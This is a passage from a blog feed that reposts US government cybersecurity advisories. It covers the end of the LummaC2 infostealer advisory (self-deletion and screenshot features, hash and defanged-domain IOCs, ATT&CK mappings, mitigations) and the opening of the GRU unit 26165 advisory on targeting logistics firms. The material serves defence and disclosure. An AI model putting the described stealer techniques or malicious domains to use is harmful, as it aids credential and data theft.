<td>Executive with <code>rund1132.exe</code></td>
</tr>
</tbody>
</table>
<h4><strong>5. Take Screenshot</strong></h4>
<p>If the configuration JSON file has a key of “<code>se</code>” and its value is “<code>true</code>,” the malware will take a screenshot in BMP format and upload it to the C2 server.</p>
<h4><strong>6. Delete Self</strong></h4>
<p>If the configuration JSON file has a key of “<code>ad</code>” and its value is “<code>true</code>,” the malware will enter a routine to delete itself.</p>
<p>The command shown in <strong>Figure 9</strong> will be decoded and executed for self-deletion.</p>
<figure class="c-figure c-figure--image" role="group">
<div class="c-figure__media">    <img src="https://www.cisa.gov/sites/default/files/styles/large/public/2025-05/Figure%209%20-%20Self-Deletion%20Command%20Line.png?itok=BqtyYanh" width="649" height="44" alt="Figure 9. Self-Deletion Command Line"></p>
</div>
<figcaption class="c-figure__caption"><em>Figure 9. Self-Deletion Command Line</em></figcaption>
</figure>
<p><strong>Figure 10</strong> depicts the above command line during execution.</p>
<figure class="c-figure c-figure--image" role="group">
<div class="c-figure__media">    <img src="https://www.cisa.gov/sites/default/files/styles/large/public/2025-05/Figure%2010%20-%20Decoded%20Command%20Line%20in%20Memory.png?itok=QsVu940K" width="662" height="192" alt="Figure 10. Decoded Command Line in Memory"></p>
</div>
<figcaption class="c-figure__caption"><em>Figure 10. Decoded Command Line in Memory</em></figcaption>
</figure>
<h3>Host Modifications</h3>
<p>Without any C2 interactions, the LummaC2 malware does not create any files on the infected drive. It simply runs in memory, gathers system information, and exfiltrates it to the C2 server [<a href="https://attack.mitre.org/versions/v17/techniques/T1082/" target="_blank" title="T1082">T1082</a>]. The commands returned from the C2 server could indicate that it drops additional files and/or saves data to files on the local hard drive. This is variable, as these commands come from the C2 server and are mutable.</p>
<h3>Decrypted Strings</h3>
<p>Below is a list of hard-coded decrypted strings located in the binary (see <strong>Figure 11</strong>).</p>
<figure class="c-figure c-figure--image" role="group">
<div class="c-figure__media">    <img src="https://www.cisa.gov/sites/default/files/styles/large/public/2025-05/Figure%2011%20-%20Decoded%20Strings.png?itok=4A8LZC0N" width="653" height="355" alt="Figure 11. Decoded Strings"></p>
</div>
<figcaption class="c-figure__caption"><em>Figure 11. Decoded Strings</em></figcaption>
</figure>
<h2><strong>Indicators of Compromise</strong></h2>
<p>See <strong>Table 6</strong> and <strong>Table 7</strong> for LummaC2 IOCs obtained by the FBI and trusted third parties.</p>
<p><strong>Disclaimer:</strong> The authoring agencies recommend organizations investigate and vet these indicators of compromise prior to taking action, such as blocking.</p>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 6. LummaC2 Executable Hashes</em></caption>
<thead>
<tr>
<th role="columnheader">Executables</th>
<th role="columnheader">Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>4AFDC05708B8B39C82E60ABE3ACE55DB (<code>LummaC2.exe</code> from November 2023)</td>
<td>MD5</td>
</tr>
<tr>
<td>E05DF8EE759E2C955ACC8D8A47A08F42 (<code>LummaC2.exe</code> from November 2023)</td>
<td>MD5</td>
</tr>
<tr>
<td>C7610AE28655D6C1BCE88B5D09624FEF</td>
<td>MD5</td>
</tr>
<tr>
<td>1239288A5876C09D9F0A67BCFD645735168A7C80 (<code>LummaC2.exe</code> from November 2023)</td>
<td>SHA1</td>
</tr>
<tr>
<td>B66DA4280C6D72ADCC68330F6BD793DF56A853CB (<code>LummaC2.exe</code> from November 2023)</td>
<td>SHA1</td>
</tr>
<tr>
<td>3B267FA5E1D1B18411C22E97B367258986E871E5</td>
<td>TLSH</td>
</tr>
<tr>
<td>19CC41A0A056E503CC2137E19E952814FBDF14F8D83F799AEA9B96ABFF11EFBB (November 2023)</td>
<td>SHA256</td>
</tr>
<tr>
<td>2F31D00FEEFE181F2D8B69033B382462FF19C35367753E6906ED80F815A7924F (<code>LummaC2.exe</code> from November 2023)</td>
<td>SHA256</td>
</tr>
<tr>
<td>4D74F8E12FF69318BE5EB383B4E56178817E84E83D3607213160276A7328AB5D</td>
<td>SHA256</td>
</tr>
<tr>
<td>325daeb781f3416a383343820064c8e98f2e31753cd71d76a886fe0dbb4fe59a</td>
<td>SHA256</td>
</tr>
<tr>
<td>76e4962b8ccd2e6fd6972d9c3264ccb6738ddb16066588dfcb223222aaa88f3c</td>
<td>SHA256</td>
</tr>
<tr>
<td>7a35008a1a1ae3d093703c3a34a21993409af42eb61161aad1b6ae4afa8bbb70</td>
<td>SHA256</td>
</tr>
<tr>
<td>a9e9d7770ff948bb65c0db24431f75dd934a803181afa22b6b014fac9a162dab</td>
<td>SHA256</td>
</tr>
<tr>
<td>b287c0bc239b434b90eef01bcbd00ff48192b7cbeb540e568b8cdcdc26f90959</td>
<td>SHA256</td>
</tr>
<tr>
<td>ca47c8710c4ffb4908a42bd986b14cddcca39e30bb0b11ed5ca16fe8922a468b</td>
<td>SHA256</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 7. LummaC2 DLL Binaries</em></caption>
<thead>
<tr>
<th role="columnheader">DLL Binaries</th>
<th role="columnheader">Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>iphlpapi.dll</td>
<td>IP Helper API</td>
</tr>
<tr>
<td>winhttp.dll</td>
<td>Windows HTTP Services</td>
</tr>
</tbody>
</table>
<p>The following are domains observed deploying LummaC2 malware.</p>
<div class="WordSection1">
<p><strong>Disclaimer:</strong> The domains below are historical in nature and may not currently be malicious.</p>
</div>
<div class="WordSection2">
<ul>
<li>Pinkipinevazzey[.]pw</li>
<li>Fragnantbui[.]shop</li>
<li>Medicinebuckerrysa[.]pw</li>
<li>Musicallyageop[.]pw</li>
<li>stogeneratmns[.]shop</li>
<li>wallkedsleeoi[.]shop</li>
<li>Tirechinecarpet[.]pw</li>
<li>reinforcenh[.]shop</li>
<li>reliabledmwqj[.]shop</li>
<li>Musclefarelongea[.]pw</li>
<li>Forbidstow[.]site</li>
<li>gutterydhowi[.]shop</li>
<li>Fanlumpactiras[.]pw</li>
<li>Computeryrati[.]site</li>
<li>Contemteny[.]site</li>
<li>Ownerbuffersuperw[.]pw</li>
<li>Seallysl[.]site</li>
<li>Dilemmadu[.]site</li>
<li>Freckletropsao[.]pw</li>
<li>Opposezmny[.]site</li>
<li>Faulteyotk[.]site</li>
<li>Hemispheredodnkkl[.]pw</li>
<li>Goalyfeastz[.]site</li>
<li>Authorizev[.]site</li>
<li>ghostreedmnu[.]shop</li>
<li>Servicedny[.]site</li>
<li>blast-hubs[.]com</li>
<li>offensivedzvju[.]shop</li>
<li>friendseforever[.]help</li>
<li>blastikcn[.]com</li>
<li>vozmeatillu[.]shop</li>
<li>shiningrstars[.]help</li>
<li>penetratebatt[.]pw</li>
<li>drawzhotdog[.]shop</li>
<li>mercharena[.]biz</li>
<li>pasteflawwed[.]world</li>
<li>generalmills[.]pro</li>
<li>citywand[.]live</li>
<li>hoyoverse[.]blog</li>
<li>nestlecompany[.]pro</li>
<li>esccapewz[.]run</li>
<li>dsfljsdfjewf[.]info</li>
<li>naturewsounds[.]help</li>
<li>travewlio[.]shop</li>
<li>decreaserid[.]world</li>
<li>stormlegue[.]com</li>
<li>touvrlane[.]bet</li>
<li>governoagoal[.]pw</li>
<li>paleboreei[.]biz</li>
<li>calmingtefxtures[.]run</li>
<li>foresctwhispers[.]top</li>
<li>tracnquilforest[.]life</li>
<li>sighbtseeing[.]shop</li>
<li>advennture[.]top</li>
<li>collapimga[.]fun</li>
<li>holidamyup[.]today</li>
<li>pepperiop[.]digital</li>
<li>seizedsentec[.]online</li>
<li>triplooqp[.]world</li>
<li>easyfwdr[.]digital</li>
<li>strawpeasaen[.]fun</li>
<li>xayfarer[.]live</li>
<li>jrxsafer[.]top</li>
<li>quietswtreams[.]life</li>
<li>oreheatq[.]live</li>
<li>plantainklj[.]run</li>
<li>starrynsightsky[.]icu</li>
<li>castmaxw[.]run</li>
<li>puerrogfh[.]live</li>
<li>earthsymphzony[.]today</li>
<li>weldorae[.]digital</li>
<li>quavabvc[.]top</li>
<li>citydisco[.]bet</li>
<li>steelixr[.]live</li>
<li>furthert[.]run</li>
<li>featureccus[.]shop</li>
<li>smeltingt[.]run</li>
<li>targett[.]top</li>
<li>mrodularmall[.]top</li>
<li>ferromny[.]digital</li>
<li>ywmedici[.]top</li>
<li>jowinjoinery[.]icu</li>
<li>rodformi[.]run</li>
<li>legenassedk[.]top</li>
<li>htardwarehu[.]icu</li>
<li>metalsyo[.]digital</li>
<li>ironloxp[.]live</li>
<li>cjlaspcorne[.]icu</li>
<li>navstarx[.]shop</li>
<li>bugildbett[.]top</li>
<li>latchclan[.]shop</li>
<li>spacedbv[.]world</li>
<li>starcloc[.]bet</li>
<li>rambutanvcx[.]run</li>
<li>galxnetb[.]today</li>
<li>pomelohgj[.]top</li>
<li>scenarisacri[.]top</li>
<li>jawdedmirror[.]run</li>
<li>changeaie[.]top</li>
<li>lonfgshadow[.]live</li>
<li>liftally[.]top</li>
<li>nighetwhisper[.]top</li>
<li>salaccgfa[.]top</li>
<li>zestmodp[.]top</li>
<li>owlflright[.]digital</li>
<li>clarmodq[.]top</li>
<li>piratetwrath[.]run</li>
<li>hemispherexz[.]top</li>
<li>quilltayle[.]live</li>
<li>equatorf[.]run</li>
<li>latitudert[.]live</li>
<li>longitudde[.]digital</li>
<li>climatologfy[.]top</li>
<li>starofliught[.]top</li>
</ul>
<h2><strong>MITRE ATT&amp;CK Tactics and Techniques</strong></h2>
<p>See <strong>Table 8</strong> through <strong>Table 13</strong> for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&amp;CK Mapping">Best Practices for MITRE ATT&amp;CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="Decider Tool">Decider Tool</a>.</p>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 8. Initial Access</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Phishing</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1566/" target="_blank" title="T1566">T1566</a></td>
<td>Threat actors delivered LummaC2 malware through phishing emails.</td>
</tr>
<tr>
<td>Phishing: Spearphishing Attachment</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1566/001/" target="_blank" title="T1566.001">T1566.001</a></td>
<td>Threat actors used spearphishing attachments to deploy LummaC2 malware payloads.</td>
</tr>
<tr>
<td>Phishing: Spearphishing Link</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1566/002/" target="_blank" title="T1566.002">T1566.002</a></td>
<td>Threat actors used spearphishing hyperlinks to deploy LummaC2 malware payloads.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 9. Defense Evasion</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Obfuscated Files or Information</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1027/" target="_blank" title="T1027">T1027</a></td>
<td>Threat actors obfuscated the malware to bypass standard cybersecurity measures designed to flag common phishing attempts or drive-by downloads.</td>
</tr>
<tr>
<td>Masquerading</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1036/" target="_blank" title="T1036">T1036</a></td>
<td>Threat actors delivered LummaC2 malware via spoofed software.</td>
</tr>
<tr>
<td>Deobfuscate/Decode Files or Information</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1140/" target="_blank" title="T1140">T1140</a></td>
<td>Threat actors used LummaC2 malware to decrypt its callback C2 domains.</td>
</tr>
</tbody>
</table>
<div>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 10. Discovery</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Query Registry</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1012/" target="_blank" title="T1012">T1012</a></td>
<td>Threat actors used LummaC2 malware to query the user’s name and computer name utilizing the APIs GetUserNameW and GetComputerNameW.</td>
</tr>
<tr>
<td>Browser Information Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1217/" target="_blank" title="T1217">T1217</a></td>
<td>Threat actors used LummaC2 malware to steal browser data.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 11. Collection</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Automated Collection</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1119/" target="_blank" title="T1119">T1119</a></td>
<td>LummaC2 malware has automated collection of various information including cryptocurrency wallet details.</td>
</tr>
</tbody>
</table>
</div>
</div>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 12. Command and Control</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Application Layer Protocol: Web Protocols</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1071/001/" target="_blank" title="T1071.001">T1071.001</a></td>
<td>Threat actors used LummaC2 malware to attempt POST requests.</td>
</tr>
<tr>
<td>Ingress Tool Transfer</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1105/" target="_blank" title="T1105">T1105</a></td>
<td>Threat actors used LummaC2 malware to transfer a remote file to compromised systems.</td>
</tr>
</tbody>
</table>
<div>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table&nbsp;13. Exfiltration</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Exfiltration</td>
<td><a href="https://attack.mitre.org/versions/v17/tactics/TA0010/" target="_blank" title="TA0010">TA0010</a></td>
<td>Threat actors used LummaC2 malware to exfiltrate sensitive user information, including traditional credentials, cryptocurrency wallets, browser extensions, and MFA details without immediate detection.</td>
</tr>
<tr>
<td>Native API</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1106/" title="T1106">T1106</a></td>
<td>Threat actors used LummaC2 malware to download files with native OS APIs.</td>
</tr>
</tbody>
</table>
</div>
<h2><strong>Mitigations</strong></h2>
<p>The FBI and CISA recommend organizations implement the mitigations below to reduce the risk of compromise by LummaC2 malware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="CPGs webpage">CPGs webpage</a> for more information on the CPGs, including additional recommended baseline protections. These mitigations apply to all critical infrastructure organizations.</p>
<ul>
<li><strong>Separate User and Privileged Accounts:&nbsp;</strong>Allow only necessary users and applications access to the registry [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SeparatingUserandPrivilegedAccounts2E" title="CPG 2.E">CPG 2.E</a>].</li>
<li><strong>Monitor and detect suspicious behavior&nbsp;</strong>during exploitation [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#DetectingRelevantThreatsandTTPs3A" title="CPG 3.A">CPG 3.A</a>].
<ul>
<li>Monitor and detect suspicious behavior, creation and termination events, and unusual and unexpected processes running.</li>
<li>Monitor API calls that may attempt to retrieve system information.</li>
<li>Analyze behavior patterns from process activities to identify anomalies.</li>
<li>For more information, visit CISA’s guidance on:&nbsp;<a href="https://www.cisa.gov/resources-tools/resources/enhanced-visibility-and-hardening-guidance-communications-infrastructure" title="Enhanced Visibility and Hardening Guidance for Communications Infrastructure">Enhanced Visibility and Hardening Guidance for Communications Infrastructure</a>.</li>
</ul>
</li>
<li><strong>Implement application controls</strong> to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.</li>
<li><strong>Protect against threat actor phishing campaigns</strong> by implementing CISA’s&nbsp;<a href="https://www.cisa.gov/resources-tools/resources/phishing-guidance-stopping-attack-cycle-phase-one" title="Phishing Guidance">Phishing Guidance</a> and&nbsp;<a href="https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf" title="Phishing-resistant multifactor authentication">Phishing-resistant multifactor authentication</a>. [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#PhishingResistantMultifactorAuthenticationMFA2H" title="CPG 2.H">CPG 2.H</a>]</li>
<li><strong>Log Collection:</strong> Regularly monitoring and reviewing registry changes and access logs can support detection of LummaC2 malware [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#LogCollection2T" title="CPG 2.T">CPG 2.T</a>].</li>
<li><strong>Implement authentication, authorization, and accounting (AAA)&nbsp;</strong>systems [<a href="https://attack.mitre.org/versions/v17/mitigations/M1018/" target="_blank" title="M1018">M1018</a>] to limit actions users can perform and review logs of user actions to detect unauthorized use and abuse. Apply principles of least privilege to user accounts and groups, allowing only the performance of authorized actions.</li>
<li><strong>Audit user accounts and revoke credentials for departing employees,</strong> removing those that are inactive or unnecessary on a routine basis [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#RevokingCredentialsforDepartingEmployees2D" title="CPG 2.D">CPG 2.D</a>]. Limit the ability for user accounts to create additional accounts.</li>
<li><strong>Keep systems up to date&nbsp;</strong>with regular updates, patches, hot fixes, and service packs that may minimize vulnerabilities. Learn more by visiting CISA’s webpage:&nbsp;<a href="https://www.cisa.gov/secure-our-world/update-software" title="Secure our World Update Software">Secure our World Update Software</a>.</li>
<li><strong>Secure network devices&nbsp;</strong>to restrict command line access.
<ul>
<li>Learn more about defending against the malicious use of remote access software by visiting CISA’s&nbsp;<a href="https://www.cisa.gov/sites/default/files/2023-06/Guide%20to%20Securing%20Remote%20Access%20Software_clean%20Final_508c.pdf" title="Guide to Securing Remote Access Software">Guide to Securing Remote Access Software</a>.</li>
</ul>
</li>
<li><strong>Use segmentation</strong> to prevent access to sensitive systems and information, possibly with the use of Demilitarized Zone (DMZ) or virtual private cloud (VPC) instances to isolate systems [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#NetworkSegmentation2F" title="CPG 2.F">CPG 2.F</a>].</li>
<li><strong>Monitor and detect API</strong> usage, looking for unusual or malicious behavior.</li>
</ul>
<h2><strong>Validate Security Controls</strong></h2>
<p>In addition to applying mitigations, the FBI and CISA recommend exercising, testing, and validating your organization’s security program against threat behaviors mapped to the MITRE ATT&amp;CK Matrix for Enterprise framework in this advisory. The FBI and CISA recommend testing your existing security controls inventory to assess performance against the ATT&amp;CK techniques described in this advisory.</p>
<p>To get started:</p>
<ol>
<li>Select an ATT&amp;CK technique described in this advisory (see <strong>Table 8</strong> through <strong>Table 13</strong>).</li>
<li>Align your security technologies against the technique.</li>
<li>Test your technologies against the technique.</li>
<li>Analyze your detection and prevention technologies’ performance.</li>
<li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
<li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
</ol>
<p>The FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory.</p>
<h2><strong>Reporting</strong></h2>
<p>Your organization has no obligation to respond or provide information to the FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws.</p>
<p>The FBI is interested in any information that can be shared, to include the status and scope of infection, estimated loss, date of infection, date detected, initial attack vector, and host- and network-based indicators.</p>
<p>To report information, please contact the FBI’s Internet Crime Complaint Center (IC3), <a href="https://www.fbi.gov/contact-us/field-offices" target="_blank" title="your local FBI field office">your local FBI field office</a>, or CISA’s 24/7 Operations Center at <a href="mailto:report@cisa.gov" title="report@cisa.gov">report@cisa.gov</a> or (888) 282-0870.</p>
<h2><strong>Disclaimer</strong></h2>
<p>The information in this report is being provided “as is” for informational purposes only. The FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favor by the FBI and CISA.</p>
<h2><strong>Acknowledgements</strong></h2>
<p>ReliaQuest contributed to this advisory.</p>
<h2><strong>Version History</strong></h2>
<p><strong>May 21, 2025:</strong> Initial version.</p>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p>Source: US-CERT Alerts</p>
]]></content:encoded>
			<wfw:commentRss>http://disensogroup.com/threat-actors-deploy-lummac2-malware-to-exfiltrate-sensitive-data-from-organizations/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Russian GRU Targeting Western Logistics Entities and Technology Companies</title>
		<link>http://disensogroup.com/russian-gru-targeting-western-logistics-entities-and-technology-companies/</link>
		<comments>http://disensogroup.com/russian-gru-targeting-western-logistics-entities-and-technology-companies/#comments</comments>
		<pubDate>Mon, 12 May 2025 16:49:12 +0000</pubDate>
		<dc:creator><![CDATA[pdisenso]]></dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[aside format]]></category>

		<guid isPermaLink="false">http://disensogroup.com/russian-gru-targeting-western-logistics-entities-and-technology-companies/</guid>
		<description><![CDATA[Executive Summary This joint cybersecurity advisory (CSA) highlights a Russian state-sponsored cyber campaign targeting Western logistics entities and technology companies. This includes those involved in the coordination, transport, and delivery of foreign assistance to Ukraine. Since 2022, Western logistics entities and IT companies have faced an elevated risk of targeting by the Russian General Staff...]]></description>
				<content:encoded><![CDATA[<h2><strong>Executive Summary</strong></h2>
<p>This joint cybersecurity advisory (CSA) highlights a Russian state-sponsored cyber campaign targeting Western logistics entities and technology companies. This includes those involved in the coordination, transport, and delivery of foreign assistance to Ukraine. Since 2022, Western logistics entities and IT companies have faced an elevated risk of targeting by the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (85th GTsSS), military unit 26165—tracked in the cybersecurity community under several names (see “<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#CybersecurityIndustryTracking" title="CybersecurityIndustryTracking">Cybersecurity Industry Tracking</a>”). The actors’ cyber espionage-oriented campaign, targeting technology companies and logistics entities, uses a mix of previously disclosed tactics, techniques, and procedures (TTPs). The authoring agencies expect similar targeting and TTP use to continue.</p>
<p>Executives and network defenders at logistics entities and technology companies should recognize the elevated threat of unit 26165 targeting, increase monitoring and threat hunting for known TTPs and indicators of compromise (IOCs), and posture network defenses with a presumption of targeting.</p>
<p>This cyber espionage-oriented campaign targeting logistics entities and technology companies uses a mix of previously disclosed TTPs and is likely connected to these actors’ wide scale targeting of IP cameras in Ukraine and bordering NATO nations.</p>
<p>The following authors and co-sealers are releasing this CSA:</p>
<ul>
<li>United States National Security Agency (NSA)</li>
<li>United States Federal Bureau of Investigation (FBI)</li>
<li>United Kingdom National Cyber Security Centre (NCSC-UK)</li>
<li>Germany Federal Intelligence Service (BND)&nbsp;Bundesnachrichtendienst</li>
<li>Germany Federal Office for Information Security (BSI)&nbsp;Bundesamt für Sicherheit in der Informationstechnik</li>
<li>Germany Federal Office for the Protection of the Constitution (BfV)&nbsp;Bundesamt für Verfassungsschutz</li>
<li>Czech Republic Military Intelligence (VZ)&nbsp; Vojenské zpravodajství</li>
<li>Czech Republic National Cyber and Information Security Agency (NÚKIB)&nbsp;Národní úřad pro kybernetickou a informační bezpečnost</li>
<li>Czech Republic Security Information Service (BIS)&nbsp;Bezpečnostní informační služba</li>
<li>Poland Internal Security Agency (ABW)&nbsp;Agencja Bezpieczeństwa Wewnętrznego</li>
<li>Poland Military Counterintelligence Service (SKW)&nbsp;Służba Kontrwywiadu Wojskowego</li>
<li>United States Cybersecurity and Infrastructure Security Agency (CISA)</li>
<li>United States Department of Defense Cyber Crime Center (DC3)</li>
<li>United States Cyber Command (USCYBERCOM)</li>
<li>Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)</li>
<li>Canadian Centre for Cyber Security (CCCS)</li>
<li>Danish Defence Intelligence Service (DDIS)&nbsp;Forsvarets Efterretningstjeneste</li>
<li>Estonian Foreign Intelligence Service (EFIS)&nbsp;Välisluureamet</li>
<li>Estonian National Cyber Security Centre (NCSC-EE)&nbsp;Küberturvalisuse keskus</li>
<li>French Cybersecurity Agency (ANSSI)&nbsp;Agence nationale de la sécurité des systèmes d&#8217;information</li>
<li>Netherlands Defence Intelligence and Security Service (MIVD)&nbsp;Militaire Inlichtingen- en Veiligheidsdienst<br />&nbsp;</li>
</ul>
<p>Download the PDF version of this report:</p>
<ul>
<li><a href="https://media.defense.gov/2025/May/21/2003719846/-1/-1/0/CSA_RUSSIAN_GRU_TARGET_LOGISTICS.PDF" target="_blank" title="Russian GRU Targeting Western Logistics Entities and Technology Companies ">Russian GRU Targeting Western Logistics Entities and Technology Companies</a> (PDF, 1,081KB)</li>
</ul>
<p>For a downloadable list of IOCs, visit:</p>
<div class="c-file">
<div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2025-05/AA25-141A-Russian-GRU-Targeting-Western-Logistics-Entities-and-Technology-Companies.stix_.xml" class="c-file__link" target="_blank">AA25-141A STIX XML</a><br />
    <span class="c-file__size">(XML,       117.02 KB<br />
  )</span>
  </div>
</div>
<div class="c-file">
<div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2025-05/AA25-141A-Russian-GRU-Targeting-Western-Logistics-Entities-and-Technology-Companies.stix_.json" class="c-file__link" target="_blank">AA25-141A STIX JSON</a><br />
    <span class="c-file__size">(JSON,       144.29 KB<br />
  )</span>
  </div>
</div>
<h2><strong>Introduction</strong></h2>
<p>For over two years, the Russian GRU 85th GTsSS, military unit 26165—commonly known in the cybersecurity community as APT28, Fancy Bear, Forest Blizzard, BlueDelta, and a variety of other identifiers—has conducted this campaign using a mix of known tactics, techniques, and procedures (TTPs), including reconstituted password spraying capabilities, spearphishing, and modification of Microsoft Exchange mailbox permissions.</p>
<p>In late February 2022, multiple Russian state-sponsored cyber actors increased the variety of cyber operations for purposes of espionage, destruction, and influence—with unit 26165 predominately involved in espionage. [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited1" title="1">1</a>] As Russian military forces failed to meet their military objectives and Western countries provided aid to support Ukraine’s territorial defense, unit 26165 expanded its targeting of logistics entities and technology companies involved in the delivery of aid. These actors have also targeted Internet-connected cameras at Ukrainian border crossings to monitor and track aid shipments.</p>
<p>Note: This advisory uses the MITRE ATT&amp;CK® for Enterprise framework, version 17. See <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#appendixa" title="Appendix A">Appendix A: MITRE ATT&amp;CK tactics and techniques</a> for a table of the threat actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques. This advisory uses the MITRE D3FEND® framework, version 1.0.</p>
<h2><strong>Description of Targets</strong></h2>
<p>The GRU unit 26165 cyber campaign against Western logistics providers and technology companies has targeted dozens of entities, including government organizations and private/commercial entities across virtually all transportation modes: air, sea, and rail. These actors have targeted entities associated with the following verticals within NATO member states, Ukraine, and at international organizations:&nbsp;</p>
<ul>
<li>&nbsp;Defense Industry</li>
<li>Transportation and Transportation Hubs (ports, airports, etc.)</li>
<li>Maritime</li>
<li>Air Traffic Management</li>
<li>IT Services</li>
</ul>
<p>In the course of the targeting lifecycle, unit 26165 actors identified and conducted follow-on targeting of additional entities in the transportation sector that had business ties to the primary target, exploiting trust relationships to attempt to gain additional access [<a href="https://attack.mitre.org/versions/v17/techniques/T1199/" target="_blank" title="T1199">T1199</a>].</p>
<p>The actors also conducted reconnaissance on at least one entity involved in the production of industrial control system (ICS) components for railway management, though a successful compromise was not confirmed [<a href="https://attack.mitre.org/versions/v17/tactics/TA0043/" target="_blank" title="TA0043">TA0043</a>].</p>
<p>The countries with targeted entities include the following, as illustrated in <strong>Figure 1</strong>:</p>
<ul>
<li>Bulgaria</li>
<li>Czech Republic</li>
<li>France</li>
<li>Germany</li>
<li>Greece</li>
<li>Italy</li>
<li>Moldova</li>
<li>Netherlands</li>
<li>Poland</li>
<li>Romania</li>
<li>Slovakia</li>
<li>Ukraine</li>
<li>United States<br />&nbsp;</li>
</ul>
<figure class="c-figure c-figure--image" role="group">
<div class="c-figure__media">    <img src="https://www.cisa.gov/sites/default/files/styles/large/public/2025-05/Countries%20with%20Targeted%20Entities.png?itok=UKD_QLvF" width="975" height="308" alt="Map demonstrating Targeted Entities"></p>
</div>
<figcaption class="c-figure__caption">Figure 1: Countries with Targeted Entities</figcaption>
</figure>
<h2><strong>Initial Access TTPs</strong></h2>
<p>To gain initial access to targeted entities, unit 26165 actors used several techniques to gain initial access to targeted entities, including (but not limited to):</p>
<ul>
<li>Credential guessing [<a href="https://attack.mitre.org/versions/v17/techniques/T1110/001/" target="_blank" title="T1110.001">T1110.001</a>] / brute force [<a href="https://attack.mitre.org/versions/v17/techniques/T1110/003/" target="_blank" title="T1110.003">T1110.003</a>]</li>
